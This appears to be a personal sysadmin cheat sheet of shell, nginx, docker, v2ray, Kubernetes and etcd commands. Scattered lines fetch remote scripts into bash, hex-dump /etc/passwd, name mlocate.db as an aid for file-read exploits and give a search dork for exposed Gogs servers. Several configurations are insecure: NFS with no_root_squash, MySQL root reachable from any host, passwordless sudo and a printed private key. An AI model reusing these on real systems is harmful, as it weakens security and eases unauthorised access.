#What is the difference between --socks5-hostname and --socks5 in curl?
#Use --socks5-hostname if DNS resolution should happen on the proxy server; use --socks5 if DNS resolution should happen locally.
curl --socks5 127.0.0.1:1080 https://www.example.com
curl --socks5-hostname 127.0.0.1:1080 https://www.example.com
curl -k --socks5-hostname 127.0.0.1:1086 --doh-url https://1.1.1.1/dns-query https://www.google.com
https_proxy=127.0.0.1:8080 curl -k https://www.google.com
http_proxy=127.0.0.1:8080 curl -k http://www.google.com
#Install trzsz
wget https://gitee.com/tinatmp/trzsz-bin/releases/download/1/trz -O /usr/local/bin/trz && wget https://gitee.com/tinatmp/trzsz-bin/releases/download/1/tsz -O /usr/local/bin/tsz && wget https://gitee.com/tinatmp/trzsz-bin/releases/download/1/trzsz -O /usr/local/bin/trzsz && chmod +x /usr/local/bin/trz && chmod +x /usr/local/bin/tsz && chmod +x /usr/local/bin/trzsz
#Install nfs-server on Debian 11
apt-get install nfs-kernel-server
mkdir /nfs
echo "/nfs *(rw,sync,no_subtree_check,no_root_squash)" >> /etc/exports
systemctl restart nfs-server
systemctl status nfs-server
#nfs-client
apt-get install nfs-common
systemctl enable rpcbind && systemctl start rpcbind
mount 192.168.3.244:/nfs /mnt
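#A sketch of making the mount persistent across reboots via /etc/fstab (same server/export as above):
echo "192.168.3.244:/nfs /mnt nfs defaults,_netdev 0 0" >> /etc/fstab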
#Golang cross-compilation
go env -w GOOS=darwin
go env -w GOOS=linux
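#The target OS/arch can also be set per build without touching the stored go env, e.g.:
GOOS=linux GOARCH=amd64 go build -o app-linux .
GOOS=darwin GOARCH=amd64 go build -o app-darwin .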
#Flush the DNS cache on macOS
sudo dscacheutil -flushcache; sudo killall -HUP mDNSResponder
#nginx reverse proxy
upstream tomcats {
server xxx.xxx.com:80;
}
server {
listen 80;
server_name xxx.xxx.xxx.xxx.109;
location / {
proxy_pass_header Server;
proxy_set_header Host xxx.xxx.com;
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header X-Scheme $scheme;
proxy_pass http://tomcats;
}
}
#yabs, the "Master Lu" of Linux, for quick machine benchmarks
wget -qO- https://raw.githubusercontent.com/masonr/yet-another-bench-script/master/yabs.sh | bash
#Automatically install missing firmware on Debian
apt-get install isenkram
isenkram-autoinstall-firmware
#sed notes 1
#Insert content on the line above or below a matching keyword
#a = append (after), i = insert (before)
sed -i '/zks/avvvvvvv' t.txt
sed -i '/zks/ivvvvvvv' t.txt
#同等于
sed -i '/zks/a\vvvvvvvvv' t.txt
sed -i '/zks/i\vvvvvvvvv' t.txt
#配合find查找处理内容
find . -name server.xml|xargs sed -i '/directory/i <!--'
find . -name server.xml|xargs sed -i '/pattern="%h/a -->'
#在某行(指具体行号)前或后加一行内容
sed "2i PermitRootLogin yes" t.txt
sed "2a PermitRootLogin yes" t.txt
#First match zks; the n command moves on to the line after the match, so the substitution is done on that next line
#& in the replacement re-inserts the matched text, \n inserts a newline
#N can be used instead of n, but they differ: n replaces the pattern space with the next line (later commands only see that line), while N appends the next line to the pattern space, so later commands operate on the combined two-line block
sed '/zks/{n;s/asdf/year1/;}' t.txt
sed '/zks/{n;s/asdf/year1\n&/g;}' t.txt
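#A minimal illustration of the n vs N difference (GNU sed assumed; zks/asdf are just placeholder lines):
printf 'zks\nasdf\n' | sed '/zks/{n;s/^/>> /;}'              #n: only the line after the match is edited -> "zks" / ">> asdf"
printf 'zks\nasdf\n' | sed '/zks/{N;s/zks\nasdf/zks-asdf/;}' #N: both lines sit in the pattern space, so the substitution can span the newline -> "zks-asdf"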
#Special characters in sshpass passwords
sshpass -p '!@#@@111'
#Use single quotes, never double quotes: with sshpass -p "!@#@@111" the shell would attempt history expansion on the !
#相关条件缩写参数
-e filename 如果 filename存在,则为真
-d filename 如果 filename为目录,则为真
-f filename 如果 filename为常规文件,则为真
-L filename 如果 filename为符号链接,则为真
-r filename 如果 filename可读,则为真
-w filename 如果 filename可写,则为真
-x filename 如果 filename可执行,则为真
-s filename 如果文件长度不为0,则为真
-h filename 如果文件是软链接,则为真
-b 被测对象是块设备
-c 被测对象是字符设备
-p 被测对象是管道
-h 被测文件是符号连接
-L 被测文件是符号连接
-S(大写) 被测文件是一个socket
-t 关联到一个终端设备的文件描述符。用来检测脚本的stdin[-t0]或[-t1]是一个终端
-r 文件具有读权限,针对运行脚本的用户
-w 文件具有写权限,针对运行脚本的用户
-x 文件具有执行权限,针对运行脚本的用户
-u set-user-id(suid)标志到文件,即普通用户可以使用的root权限文件,通过chmod +s file实现
-k 设置粘贴位
-O 运行脚本的用户是文件的所有者
-G 文件的group-id和运行脚本的用户相同
-N 从文件最后被阅读到现在,是否被修改
f1 -nt f2 文件f1是否比f2新
f1 -ot f2 文件f1是否比f2旧
f1 -ef f2 文件f1和f2是否硬连接到同一个文件
#Shell: check whether a directory exists and create it if not
#!/bin/bash
if [ ! -d "/data/test" ]; then
mkdir /data/test
fi
#shorter form
[ -d "/data/test" ] || mkdir /data/test
#or
[ ! -d "/data/test" ] && mkdir /data/test
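#mkdir -p does the same in one step, since it does not fail when the directory already exists
mkdir -p /data/test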
#Shell: check whether a file or directory exists or has a given permission
#!/bin/bash
folder="/data/test/"
file="/data/test/log"
# -x tests whether $file is executable
if [ ! -x "$file" ]; then
chmod +x $file
fi
#Numeric comparisons
-eq equal, e.g. if [ "$a" -eq "$b" ]
-ne not equal, e.g. if [ "$a" -ne "$b" ]
-gt greater than, e.g. if [ "$a" -gt "$b" ]
-ge greater than or equal, e.g. if [ "$a" -ge "$b" ]
-lt less than, e.g. if [ "$a" -lt "$b" ]
-le less than or equal, e.g. if [ "$a" -le "$b" ]
< less than (requires double parentheses), e.g. (("$a" < "$b"))
<= less than or equal (requires double parentheses), e.g. (("$a" <= "$b"))
> greater than (requires double parentheses), e.g. (("$a" > "$b"))
>= greater than or equal (requires double parentheses), e.g. (("$a" >= "$b"))
#String tests
-z true if the string is empty (length 0)
-n true if the string is non-empty
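#Example: guard against an empty variable before using it
name=""
[ -z "$name" ] && echo "name is empty"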
#test command
test -f /path/to/file
#is equivalent to
[ -f /path/to/file ]
# echo $? shows the exit status of the previous command: 0 = true, 1 = false
[root@k8s-master ~]# [ -f /etc/passwd ]
[root@k8s-master ~]# echo $?
0
[root@k8s-master ~]# [ -f /etc/passwd1 ]
[root@k8s-master ~]# echo $?
1
# &&与||区别
# 左边命令为真 则不执行右边命令
# 左边命令为假 则执行右边命令
comand1 || comand2
# 左边命令为真 则执行右边命令
# 左边命令为假 则不执行右边命令
comand1 && comand2
# 如果当前目录不存在文件 myfile,则创建一个名为 myfile 的新文件
test -e myfile || touch myfile
# 如果当前目录不存在文件 myfile,则创建一个名为 myfile 的新文件
[ ! -e myfile ] && touch myfile
# 创建一个文件,并写入内容
echo "hello world" > example.txt
# 尝试执行 cat 命令来显示文件内容
cat example.txt || echo "找不到文件"
# 尝试执行一个命令,如果执行失败,就执行另一个命令
./my_script.sh || echo "执行失败"
$ cd somedir || echo "Directory not found"
#同理可在.gitlab-ci.yml 的script中写跳过错误的命令
docker rmi $images || true
#Find out which container a process belongs to (i.e. look at its cgroup name)
ps -e -o pid,cmd,comm,cgroup
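#A rough sketch of mapping a PID back to its container: pull the 64-character ID from the cgroup and match it against docker ps
#(12345 and <full-container-id> are placeholders; this assumes the usual docker/<id> or docker-<id>.scope cgroup naming)
cat /proc/12345/cgroup | grep -o '[0-9a-f]\{64\}' | head -n 1
docker ps --no-trunc --format '{{.ID}} {{.Names}}' | grep <full-container-id>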
#Export the log directories of all replicas of a docker service in one go
docker ps | grep axyb-stg | awk -F '8080/tcp' '{print $2}' | awk '{print $1}' | xargs -i docker cp {}:/logs ./{}
#editcap usage 1
#On macOS, if editcap and the other Wireshark companion tools are "not found":
#install Wireshark first, then
#cd /Applications/Wireshark.app/Contents/MacOS
#Split a capture by time, extracting the window between -A <start time> and -B <end time>
editcap -A <start time> -B <end time> <input file> <output file>
editcap -A "2022-10-25 15:07:00" -B "2022-10-25 15:09:00" ~/Downloads/aroduct1.pcap ~/Downloads/out1.pcap
#When curl needs the JSON body as a single line
#Compress multi-line JSON into one line:
#1. open the Chrome devtools console
#2. enter
var obj = {xxxxx};
JSON.stringify(obj);
#or use an online tool, e.g.:
https://www.bejson.com/zhuanyi/
https://www.sojson.com/yasuoyihang.html
#MySQL: batch kill queries
echo "show full processlist" | mysql -uroot -pxxxx -h127.0.0.1 | grep -i "update" | grep -i "xxxx_prod" | awk '{print $1}' | xargs -i echo "kill {};" | mysql -uroot -pxxxx -h127.0.0.1
# Top 10 processes by memory usage
ps aux | sort -k4,4nr | head -n 10
ps aux | awk '{print $2, $4, $6, $11}' | sort -k3rn | head -n 10
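#Same idea sorted by CPU instead of memory (%CPU is column 3 of ps aux)
ps aux | sort -k3,3nr | head -n 10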
#Decrypt HTTPS traffic with Wireshark on macOS
# 1. Start Chrome so that it logs the TLS key material for the handshakes
/Applications/Google\ Chrome.app/Contents/MacOS/Google\ Chrome --ssl-key-log-file=/Users/xxx/tmp/sslkeylog.log
# 2. Capture packets locally or on the server with tcpdump
tcpdump port 443 and host 1.1.1.1 -w t5.pcap
# 3. Download the capture and open it in Wireshark
# Menu bar -> Wireshark -> Preferences -> Protocols -> SSL, set (Pre)-Master-Secret log filename to the file specified above
# Then filter on ssl in Wireshark, pick any packet,
# right-click -> Follow -> SSL Stream
# to see the decrypted HTTP requests.
#Use iptables to cut off established connections, similar to tcpkill
iptables -I INPUT -m state --state NEW,RELATED,ESTABLISHED -m tcp -p tcp --dport 899 -j DROP
# remove the rule again
iptables -L -n --line-number # list rules with their numbers
iptables -D INPUT 1 # delete the rule with the given number
#Databases of local file paths on Linux; handy in arbitrary-file-read exploits, provided locate is installed
/var/lib/mlocate/mlocate.db
/var/lib/locate.db
#These are the databases behind the locate command and contain every local file path on the system.
#locate can dump their contents back out to a file.
# systemd-cgls recursively shows the cgroup hierarchy, e.g. to check whether a process belongs to a docker container
#Modern command-line tools:
dperf #100Gbps network performance / load testing tool https://github.com/baidu/dperf
dust #replacement for du https://github.com/bootandy/dust
duf #replacement for df https://github.com/muesli/duf
procs #replacement for ps https://github.com/dalance/procs
bottom #replacement for top https://github.com/ClementTsang/bottom
exa #replacement for ls https://github.com/ogham/exa
zoxide #replacement for cd https://github.com/ajeetdsouza/zoxide
ripgrep #replacement for grep https://github.com/BurntSushi/ripgrep
bat #replacement for cat https://github.com/sharkdp/bat
httpie #replacement for curl https://github.com/httpie/httpie
hyperfine #replacement for time https://github.com/sharkdp/hyperfine
sed -i 's/mult_offline_start/offline_start/' xx.txt
#Killing processes 1
1.
ps aux|grep alert1.py|grep -v grep|awk '{print "kill -9 " $2}' |sh
2.
ps aux|grep alert1.py|grep -v grep|awk '{print $2}' | xargs kill -9
3.
pidlist=`ps aux |grep alert1.py |grep -v grep|awk '{print $2}'`
kill -9 $pidlist
# ps -elf works as well in place of ps aux
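#pkill -f matches against the full command line and does the same in one step
pkill -9 -f alert1.py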
#nginx 反向代理websocket 添加https wss方式
#证书可以在 来此加密 https://letsencrypt.osfipin.com/ 免费申请
map $http_upgrade $connection_upgrade {
default upgrade;
'' close;
}
server {
server_name wss.xxx.xxx;
listen 81 ssl;
ssl_certificate /etc/nginx/cert/fullchain.crt;
ssl_certificate_key /etc/nginx/cert/private.pem;
ssl_session_timeout 1d;
ssl_session_cache shared:MozSSL:10m;
ssl_session_tickets off;
ssl_protocols TLSv1.2 TLSv1.3;
ssl_ciphers ECDHE-ECDSA-AES128-GCM-SHA256:ECDHE-RSA-AES128-GCM-SHA256:ECDHE-ECDSA-AES256-GCM-SHA384:ECDHE-RSA-AES256-GCM-SHA384:ECDHE-ECDSA-CHACHA20-POLY1305:ECDHE-RSA-CHACHA20-POLY1305:DHE-RSA-AES128-GCM-SHA256:DHE-RSA-AES256-GCM-SHA384;
ssl_prefer_server_ciphers off;
# 开启OCSP stapling
ssl_stapling on;
ssl_stapling_verify on;
location / {
proxy_pass https://api.hubi.pro;
proxy_read_timeout 300s;
proxy_send_timeout 300s;
proxy_set_header Host api.hubi.pro;
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
proxy_http_version 1.1;
proxy_set_header Upgrade $http_upgrade;
proxy_set_header Connection $connection_upgrade;
proxy_ssl_server_name on;
}
}
#nginx 反向代理websocket 不加密 ws方式
# nginx的方式
map $http_upgrade $connection_upgrade {
default upgrade;
'' close;
}
server {
server_name xxx.pro;
listen 81;
location / {
proxy_pass https://api.hubi.pro;
proxy_read_timeout 300s;
proxy_send_timeout 300s;
proxy_set_header Host api.hubi.pro;
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
proxy_http_version 1.1;
proxy_set_header Upgrade $http_upgrade;
proxy_set_header Connection $connection_upgrade;
proxy_ssl_server_name on;
}
}
#redir方式
redir :2448 143.204.86.1:443
#本地修改hosts文件
x.x.x.x api.hubi.pro
#supervisor
#容器中
apt-get install supervisor
service supervisor start
/etc/supervisor/conf.d/test.conf
[program:test]
command = /usr/local/bin/python -u /opt/a.py
directory = /opt
user = root
startsecs = 3
redirect_stderr = true
stdout_logfile_maxbytes = 50MB
stdout_logfile_backups = 10
stdout_logfile = /opt/app.log
service supervisor stop
service supervisor start
supervisorctl status
supervisorctl start test
supervisorctl stop test
# 2>&1 后台任务
# 注意顺序: 2>&1 应该放到 >log 的后面
nohup java -jar app.jar >log 2>&1 &
nohup python -u xxx.py >log 2>&1 &
#可简写为
nohup java -jar app.jar &>log & #建议按此方式
#或者
nohup java -jar app.jar >&log &
#docker中运行crontab任务
#debian内核
apt-get update
apt-get install cron
service cron start
#dockerfile1
FROM x.x.x.x:80/public/base-python:0.0.2
WORKDIR /opt
ADD . /opt/
ENV QUANTIFY_ENV=prod
{docker_copy_str}
RUN test -f /opt/requirements.txt && pip config set global.index-url https://pypi.tuna.tsinghua.edu.cn/simple && pip install -r /opt/requirements.txt || true
ENTRYPOINT ["tini", "--"]
CMD ["/bin/bash","-c","/usr/local/bin/python /opt/{service-exec}"]
#nginx 反向代理https中出现502的错误
location ^~ /
{
proxy_pass https://www.binance.com/;
proxy_set_header Host www.binance.com;
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
proxy_set_header REMOTE-HOST $remote_addr;
add_header X-Cache $upstream_cache_status;
proxy_ssl_server_name on;
}
# proxy_ssl_server_name on; 这句是重点
#curl 下使用代理
http_proxy=localhost:8080 https_proxy=localhost:8080 curl -k https://ifconfig.io
#参考:https://segmentfault.com/a/1190000039292756
curl -x "http://192.168.3.100:5087" "http://ifconfig.me"
#nginx 禁止spring cloud Gateway 的 actuator地址
location ~* .*/actuator.* {
return 403;
}
location ^~ /xxx/actuator {
return 403;
}
#防止ssh暴力破解
# 机器内核版本太老,未安装fail2ban
# cat /root/Denyhosts/Denyhosts.sh
#!/bin/bash
#Denyhosts SHELL SCRIPT
cat /var/log/secure|awk '/Failed/{print $(NF-3)}'|grep -v '127.0.0.1'|sort|uniq -c|awk '{print $2"=" $1;}' >/root/Denyhosts/Denyhosts.txt
DEFINE="10"
for i in `cat /root/Denyhosts/Denyhosts.txt`
do
IP=`echo $i|awk -F= '{print $1}'`
NUM=`echo $i|awk -F= '{print $2}'`
if [ $NUM -gt $DEFINE ]
then
ipExists=`grep $IP /etc/hosts.deny |grep -v grep |wc -l`
if [ $ipExists -lt 1 ]
then
echo "sshd:$IP" >> /etc/hosts.deny
fi
fi
done
cat >/etc/cron.d/denyssh <<eof
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
*/2 * * * * root /root/Denyhosts/Denyhosts.sh
eof
#git 修改 remote url
#查看remote url
git ls-remote --get-url origin
#修改remote url
git remote set-url origin http://xxx
#另一种办法
git remote rm origin
git remote add origin http://xxx
#nginx 端口转发
apt-get update && apt-get upgrade
apt-get install nginx
apt-get install python3-certbot-nginx
certbot --nginx --agree-tos --redirect --hsts --staple-ocsp --email you@example.com -d www.example.com
#nginx.conf
events {
worker_connections 102400;
# multi_accept on;
}
stream{
server{
listen 25 ssl;
ssl_protocols TLSv1 TLSv1.1 TLSv1.2;
ssl_certificate /etc/letsencrypt/live/test.xx.vg/fullchain.pem;
ssl_certificate_key /etc/letsencrypt/live/test.xx.vg/privkey.pem;
proxy_pass eth.ss.xx.me:1883;
}
}
cat > /opt/cert.sh <<EOF
/usr/bin/certbot renew --cert-name test.xx.vg --force-renewal
nginx -s reload
EOF
chmod +x /opt/cert.sh
#每隔25天生成一次
cat >/etc/cron.d/nginxcert <<eof
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
00 00 */25 * * root /opt/cert.sh
eof
#利用nginx把TCP端口转换为支持ssl加密的
worker_connections 10240;
stream{
server{
listen 25 ssl;
ssl_protocols TLSv1 TLSv1.1 TLSv1.2;
ssl_certificate pem;
ssl_certificate_key key;
#proxy_pass poolip:port
proxy_pass xxx.pool.com:5555;
}
}
http{}
#端口重定向、转发
#安装
apt-get install socat
#使用
nohup socat TCP-LISTEN:6688,reuseaddr,fork TCP:xxx.pool.com:6688 >> socat.log 2>&1 & disown
#端口重定向、转发
#安装
apt-get install redir
#使用
redir :6666 xx.pool.com:6688 #监听访问本服务器的6666 并转发到xx.pool.com 的6688端口下
redir --lport=80 --cport=22 --caddr=192.168.0.5 --debug
redir --lport=80 --cport=22 --caddr=192.168.0.5 --syslog --name=redirSSH
#linux 快速 proxy 小脚本
root@debian:/usr/local/bin# cat /usr/local/bin/fq
#!/bin/bash
#link="socks5://127.0.0.1:1080"
link="http://127.0.0.1:1087"
proxy=$link \
http_proxy=$link \
https_proxy=$link \
ftp_proxy=$link \
rsync_proxy=$link \
all_proxy=$link \
no_proxy="localhost,127.0.0.1,localaddress,.localdomain.com" \
server_proxy=$link \
PROXY=$link \
HTTP_PROXY=$link \
HTTPS_PROXY=$link \
FTP_PROXY=$link \
RSYNC_PROXY=$link \
ALL_PROXY=$link \
NO_PROXY="localhost,127.0.0.1,localaddress,.localdomain.com" \
SERVER_PROXY=$link \
$*
chmod +x /usr/local/bin/fq
#使用
fq curl https://www.google.com.hk/
#linux下安装v2ray客户端
mkdir /opt/v2ray
cat >/opt/v2ray/config.json <<EOF
{
"log": {
"error": "",
"loglevel": "info",
"access": ""
},
"inbounds": [
{
"listen": "0.0.0.0",
"protocol": "socks",
"settings": {
"udp": false,
"auth": "noauth"
},
"port": "1080"
},
{
"listen": "0.0.0.0",
"protocol": "http",
"settings": {
"timeout": 360
},
"port": "1087"
}
],
"outbounds": [
{
"mux": {
"enabled": false,
"concurrency": 8
},
"protocol": "vmess",
"streamSettings": {
"network": "tcp",
"tcpSettings": {
"header": {
"type": "none"
}
},
"security": "none"
},
"tag": "proxy",
"settings": {
"vnext": [
{
"address": "xxx.xxx.xxx",
"users": [
{
"id": "BF0802AC-C401-D599-0363-64BB7E6B18AC",
"alterId": 0,
"level": 0,
"security": "aes-128-gcm"
}
],
"port": 27402
}
]
}
},
{
"tag": "direct",
"protocol": "freedom",
"settings": {
"domainStrategy": "UseIP",
"redirect": "",
"userLevel": 0
}
},
{
"tag": "block",
"protocol": "blackhole",
"settings": {
"response": {
"type": "none"
}
}
}
],
"dns": {},
"routing": {
"settings": {
"domainStrategy": "AsIs",
"rules": []
}
},
"transport": {}
}
EOF
docker run -d --restart=always --name v2ray -v /opt/v2ray:/etc/v2ray -p 1080:1080 -p 1087:1087 v2fly/v2fly-core
# 客户机执行 或者安装 proxychains
export https_proxy=http://127.0.0.1:1087
export http_proxy=http://127.0.0.1:1087
curl https://www.google.com
# 可利用小工具 https://github.com/arkrz/v2sub 实现订阅功能
#nginx之虚拟目录之rewrite alias
# http://127.0.0.1:81/abc/a.html #真实地址
# http://127.0.0.1:81/newdir/a.html # 指向真实地址
# 方法1 alias
location /newdir/ {
alias /var/www/html/abc/;
}
# 方法2 rewrite
location /newdir/ {
root /var/www/html/abc/;
rewrite ^/newdir/(.*?)$ /$1 break;
}
#方法3 mkdir
mkdir /var/www/html/newdir/
copy /var/www/html/abc/a.html /var/www/html/newdir/a.html
#python pip添加 加速源
mkdir ~/.pip
cat > ~/.pip/pip.conf <<EOF
[global]
timeout=600
index-url=https://mirrors.aliyun.com/pypi/simple/
trusted-host=mirrors.aliyun.com
EOF
#aws修改、删除 置放群组
aws ec2 modify-instance-placement --instance-id i-0e1xxx343100915c --group-name test1-group #修改
aws ec2 modify-instance-placement --instance-id i-004c5xxxx1ca954 --group-name "" #删除
#google gogs
inurl:"/explore/repos" "发现"
#rancher跨项目访问:
#服务发现->添加DNS记录->外部域名->目标域名->kafka2.public-common.svc.cluster.local
kafka2.public-common.svc.cluster.local
服务名.命名空间名.svc.cluster.local
#MySQL: allow connections from any IP
mysql>use mysql;
mysql>update user set host='%' where user='root';
mysql>flush privileges;
#debian设置ip
root@debian:/etc/network# cat interfaces
# This file describes the network interfaces available on your system
# and how to activate them. For more information, see interfaces(5).
source /etc/network/interfaces.d/*
# The loopback network interface
auto lo
iface lo inet loopback
# The primary network interface
allow-hotplug enp6s0
iface enp6s0 inet static
address 192.168.3.100
netmask 255.255.255.0
gateway 192.168.3.1
#jdk
#java8.sh
JAVA_HOME=/opt/jdk8
JRE_HOME=$JAVA_HOME/jre
PATH=$PATH:$JAVA_HOME/bin:$JRE_HOME/bin
CLASSPATH=.:$JAVA_HOME/lib/dt.jar:$JAVA_HOME/lib/tools.jar:$JRE_HOME/lib
export JAVA_HOME JRE_HOME PATH CLASSPATH
#java7.sh
JAVA_HOME=/opt/jdk7
JRE_HOME=$JAVA_HOME/jre
PATH=$PATH:$JAVA_HOME/bin:$JRE_HOME/bin
CLASSPATH=.:$JAVA_HOME/lib/dt.jar:$JAVA_HOME/lib/tools.jar:$JRE_HOME/lib
export JAVA_HOME JRE_HOME PATH CLASSPATH
#cp java8.sh /etc/profile.d/
#alpine 添加telnet
apk add busybox-extras
#alpine加速
sed -i "s@http://dl-cdn.alpinelinux.org/@https://repo.huaweicloud.com/@g" /etc/apk/repositories
#Add an SSH user on AWS Linux
sudo -s
adduser --shell /bin/bash --system --disabled-password newuser
su newuser
cd ~
mkdir .ssh
ssh-keygen -t rsa
cp ~/.ssh/id_rsa.pub ~/.ssh/authorized_keys
chmod 700 ~/.ssh
echo "newuser ALL=(ALL) NOPASSWD:ALL" >> /etc/sudoers.d/90-cloud-init-users
cat ~/.ssh/id_rsa #save this locally as xxx.pem and connect with your SSH client
#简单的web ssh
shellinabox
#centos安装软阵列
yum install mdadm
gdisk /dev/nvme1n1 # gdisk /dev/nvme2n1
Command (? for help): n #创建一个分区
Hex code or GUID (L to show codes, Enter = 8300): fd00 # linux raid 类型
Command (? for help): w #保存配置
#创建raid1
mdadm --create /dev/md1 -v --level=1 --raid-devices=2 /dev/nvme2n1p1 /dev/nvme1n1p1
cat /proc/mdstat #查看raid1的同步状态, 等同步完成后再格式化文件类型
mkfs.xfs /dev/md1
mkdir /md1
mount /dev/md1 /md1/
#开机自动挂载
echo "/dev/md1 /md1 xfs defaults 0 0" >> /etc/fstab
#开机自动加载raid配置
echo DEVICE /dev/nvme2n1p1 /dev/nvme2n1p2 > /etc/mdadm.conf
mdadm -Dvs >> /etc/mdadm.conf
#最终 /etc/mdadm.conf 文件内容
[root@localhost /]# cat /etc/mdadm.conf
DEVICE /dev/nvme1n1p1 /dev/nvme2n1p1
ARRAY /dev/md1 level=raid1 num-devices=2 metadata=1.2 name=localhost.localdomain:1 UUID=3dba3272:ade1a95a:db60439c:03beaadb
devices=/dev/nvme1n1p1,/dev/nvme2n1p1
#MacOS安装app提示已损坏修复指令
sudo xattr -rd com.apple.quarantine /Applications/xxxxxx.app
#在apt-get update时出现 E: Repository ‘http://security.debian.org/debian-security buster/updates InRelease’ changed its ‘Suite’ value from ‘stable’ to ‘oldstable’
apt-get update --allow-releaseinfo-change
#Truncate log files with xargs
#-i / -I assigns each input item (usually one per line) to {}, which can then be referenced in the command
#-n num limits how many arguments are passed per command invocation (default: all of them)
find /opt/app -name "*.out" -size +1000M |xargs -i -p -n 1 sh -c "echo > {}"
#Truncate the json-file logs of docker containers
cd /var/lib/docker/containers/ && du -sh ./* |grep G| awk -F " " '{print $2}' | sed 's/.\///' | xargs -i sh -c "> {}/{}-json.log"
#kubectl: switch context
kubectl config get-contexts
kubectl config use-context demo-rancher-demo2
kubectl config current-context
kubectl get nodes
#kubectl: restart pods
#Restarting can be forced by setting a throwaway environment variable on the deployment
kubectl -n default set env deployment/test12 DEPLOY_DATE=1
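#On newer kubectl (v1.15+) there is a built-in command for this, without touching env vars:
kubectl -n default rollout restart deployment/test12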
#etcd导出数据
ETCDCTL_API=3 etcdctl --cacert=/etc/kubernetes/ssl/kube-ca.pem --cert=/etc/kubernetes/ssl/kube-node.pem --key=/etc/kubernetes/ssl/kube-node-key.pem --endpoints=https://127.0.0.1:2379/ get / --prefix --keys-only | sort | uniq | xargs -I{} sh -c 'ETCDCTL_API=3 etcdctl --cacert=/etc/kubernetes/ssl/kube-ca.pem --cert=/etc/kubernetes/ssl/kube-node.pem --key=/etc/kubernetes/ssl/kube-node-key.pem --endpoints=https://127.0.0.1:2379 get {} >> output.data && echo "" >> output.data'
ETCDCTL_API=3 etcdctl --insecure-transport=false --insecure-skip-tls-verify --endpoints=https://127.0.0.1:2379/ get / --prefix --keys-only | sort | uniq | xargs -I{} sh -c 'ETCDCTL_API=3 etcdctl --insecure-transport=false --insecure-skip-tls-verify --endpoints=https://127.0.0.1:2379 get {} >> output.data && echo "" >> output.data'
#Resize an AWS EC2 disk
lsblk #confirm the partition number of the root partition (usually 1)
growpart /dev/nvme0n1 1
resize2fs /dev/nvme0n1p1
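#resize2fs only handles ext2/3/4; if the root filesystem is XFS (common on newer Amazon Linux AMIs), grow it with
xfs_growfs /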
#使用docker-connector打通宿主机与docker网络
brew install docker-connector
#生成16进制字符列表
gzip -c /etc/passwd | xxd -p -c 16 | sed -e 's/../0x&,/g'
cat /etc/passwd | xxd -p -c 16 | sed -e 's/../0x&,/g'
#Decoding socket:[number] entries in /proc/pid/fd
ls -al /proc/pid/fd/
4 -> 'socket:[78607329]'
#Look the inode id up in /proc/net/tcp to get the (hex-encoded) source and destination addresses; decode them by hand as below, with an online converter, or just use lsof
#/proc/net/tcp quick decode
46: 010310AC:9C4C 030310AC:1770 01
#(source IP:port)      (destination IP:port)
#source IP: 010310AC -> 01 03 10 AC --hex to decimal--> 1 3 16 172 --reverse byte order--> 172.16.3.1
#source port: 9C4C --hex to decimal--> 40012
#destination IP: 030310AC -> 03 03 10 AC --hex to decimal--> 3 3 16 172 --reverse byte order--> 172.16.3.3
#destination port: 1770 --hex to decimal--> 6000
lsof -i -a -p PID
2 -> 'pipe:[78480472]'
#for a pipe, lsof -n -P | grep pipeid shows both ends
#example
# 3: 92C111AC:0016 40C87472:8AE9 01 00000040:00000000 01:00000018 00000000 0 0 2397438 4 00000000c8430690 24 4 29 20 -1
#92 C1 11 AC:0016 -> 146 193 17 172 :22 -> 172.17.193.146:22
#40 C8 74 72:8AE9 -> 64 200 116 114:35561 -> 114.116.200.64:35561
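#A small shell sketch of the hex-to-IP conversion used above (bytes are little-endian, so they are read in reverse):
hex=92C111AC
printf '%d.%d.%d.%d\n' 0x${hex:6:2} 0x${hex:4:2} 0x${hex:2:2} 0x${hex:0:2}   # -> 172.17.193.146
printf '%d\n' 0x0016   # port -> 22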
#Batch kill processes by name
kill -9 $(pidof process_name)
#debian10 升级到debian11
cp /etc/apt/sources.list /etc/apt/sources.list.bak0
cat >/etc/apt/sources.list <<eof
deb http://cdn-aws.deb.debian.org/debian buster main
deb-src http://cdn-aws.deb.debian.org/debian buster main
deb http://security.debian.org/debian-security buster/updates main
deb-src http://security.debian.org/debian-security buster/updates main
deb http://cdn-aws.deb.debian.org/debian buster-updates main
deb-src http://cdn-aws.deb.debian.org/debian buster-updates main
deb http://cdn-aws.deb.debian.org/debian buster-backports main
deb-src http://cdn-aws.deb.debian.org/debian buster-backports main
eof
apt-get update &&apt install gcc-8-base -y && apt-get upgrade -y
init 6
cat >/etc/apt/sources.list <<eof
deb http://deb.debian.org/debian bullseye main contrib non-free
deb http://deb.debian.org/debian bullseye-updates main contrib non-free
deb http://security.debian.org/debian-security bullseye-security main
deb http://ftp.debian.org/debian bullseye-backports main contrib non-free
eof
#建议用国内镜像加速
cat >/etc/apt/sources.list <<eof
deb http://mirrors.huaweicloud.com/debian bullseye main contrib non-free
deb http://mirrors.huaweicloud.com/debian bullseye-updates main contrib non-free
deb http://mirrors.huaweicloud.com/debian-security bullseye-security main
deb http://mirrors.huaweicloud.com/debian bullseye-backports main contrib non-free
eof
apt-get update && apt full-upgrade -y
init 6
apt --purge autoremove
init 6
cat /etc/os-release
#Temporarily raise the max open files limit of a running process
#If an already running process (e.g. while computing proofs of space-time) reports "too many open files" and you don't want to restart it, the limit can be changed on the fly:
prlimit --pid <pid> --nofile=1048576:1048576
#If "reredirect -m a1.txt PID" hangs,
#try running the following first
reptyr PID
#View the stdout of a program already running in the background (nohup, setsid, (&) and disown all work)
#reptyr gives mixed results, for reference only
apt-get install reptyr
reptyr PID
#reredirect works well, recommended
git clone https://github.com/jerome-pouiller/reredirect/
make
make install
reredirect -m output_filename PID
#strace 可读性不高 具体还在再调整
PID=some_process_id sudo strace -f -e trace=write -e verbose=none -e write=1,2 -q -p $PID -o "| grep '^ |' | cut -c11-60 | sed -e 's/ //g' | xxd -r -p"
#openvpn禁止访问某个IP
docker exec -it openvpn /bin/bash
iptables -A FORWARD -m state --state NEW,ESTABLISHED,RELATED -d 10.1.4.19 -j REJECT
